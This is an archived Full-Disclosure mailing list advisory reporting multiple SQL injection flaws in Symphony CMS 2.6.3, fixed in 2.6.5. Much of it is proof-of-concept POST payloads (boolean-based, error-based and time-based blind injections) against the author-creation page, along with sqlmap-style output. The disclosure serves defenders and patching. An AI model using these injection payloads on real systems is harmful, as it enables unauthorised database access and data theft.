lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CALCpQr-KAMJwQSwnpS3tPsfnHj756Sgq-Z+bBBF1QWRwHj2B4g@mail.gmail.com>
Date: Sat, 30 Jan 2016 00:50:11 +0530
From: Sachin Wagh <wsachin092@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Symphony CMS 2.6.3 – Multiple SQL Injection Vulnerabilities

================================================================
Symphony CMS 2.6.3 – Multiple SQL Injection Vulnerabilities
================================================================

Information
================================================================
Vulnerability Type : Multiple SQL Injection Vulnerabilities
Vendor Homepage: http://www.getsymphony.com/
Vulnerable Version:Symphony CMS 2.6.3
Fixed Version :Symphony CMS 2.6.5
Severity: High
Author – Sachin Wagh (@tiger_tigerboy)

Description
================================================================

The vulnerability is located in the 'fields[username]','action[save]' and
'fields[email]' of the '/symphony/system/authors/new/' page.

Proof of Concept
================================================================
*1. fields[username] (POST)*

Parameter: fields[username] (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=sachin&fields[username]=-6697'
OR 7462=7462#&fields[user_type]=author&fields[password]=sach
in&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
Author

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=sachin&fields[username]=-8105'
OR 1 GROUP BY CONCAT(0x71767a7871,(SELECT (CASE WHEN (1004=1
004) THEN 1 ELSE 0 END)),0x716b7a6271,FLOOR(RAND(0)*2)) HAVING
MIN(0)#&fields[user_type]=author&fields[password]=sachin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_a
rea]=3&action[save]=Create Author

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (comment)
    Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=sachin&fields[username]=sachin123'
OR SLEEP(5)#&fields[user_type]=author&fields[password]=s
achin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
Author
---
[14:09:41] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.12, PHP 5.5.27
back-end DBMS: MySQL 5.0.12

*2. fields[email] (POST)*

Parameter: fields[email] (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=
sachin12@...l.com' AND 4852=4852 AND
'dqXl'='dqXl&fields[username]=sachinnn123&fields[user
type]=author&fields[password]=sachin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
Author

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause
    Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=
sachin12@...l.com' AND (SELECT 8298 FROM(SELECT
COUNT(*),CONCAT(0x71767a7871,(SELECT (ELT(
298=8298,1))),0x716b7a6271,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
'Pmvq'='Pmvq&fields[username]=sachinnn123&fields[user_type]=author&fields[password]=sachin&fields[
assword-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
Author

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=
sachin12@...l.com' AND (SELECT * FROM (SELECT(SLEEP(5)))xIxY) AND
'hKvH'='hKvH&fields[user
ame]=sachinnn123&fields[user_type]=author&fields[password]=sachin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
Author

*3. action[save] (POST)*

Parameter: action[save] (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload:
xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=
sachin12@...l.com
&fields[username]=sachinnn123&fields[user_type]=author&fields[password]=sa
chin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
Author%' AND 8836=8836 AND '%'='

---
[12:23:44] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.12, PHP 5.5.27
back-end DBMS: MySQL 5.0
================================================================
Vulnerable Product:
                                                               [+]
 Symphony CMS 2.6.3

Vulnerable Parameter(s):

[+]fields[username] (POST)
[+]fields[email] (POST)
[+]action[save] (POST)

Affected Area(s):
                                [+]
http://localhost/symphony2.6.3/symphony-2.6.3/symphony/system/authors/new/

================================================================
Disclosure Timeline:

Vendor notification: Jan 29, 2016
Public disclosure: Jan 30, 2016
Credits & Authors
================================================================
Sachin Wagh (@tiger_tigerboy)


-- 
Best Regards,

*Sachin Wagh*

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ